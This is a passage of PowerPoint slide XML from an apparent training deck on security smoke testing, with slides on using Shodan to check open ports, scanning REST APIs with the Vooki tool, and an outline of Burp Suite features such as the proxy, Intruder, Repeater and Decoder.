                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Smoke Test to capture Ports Details</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install chrome app : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shodan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute a GET API on browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> chrome app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Click on IP details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Observe the test results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discuss with Developer on the test results and fixes needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="991806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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Smoke Test Security Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vooki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tool installation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vooki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tool launch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Creating a project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add RESTful API’s that uses GET, POST, PUT, DELETE methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan the APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Observe the test results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generate API smoke security test report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79647307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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Versions available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lets go with Burp Suite-Community Edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download &amp; Installation of Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Walk-through of Burp Suite features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Installation of Burp Suite certificate for https testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407967002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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Suite Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proxy setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interceptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22114023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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Suite other features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intruder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Repeater</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decoder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
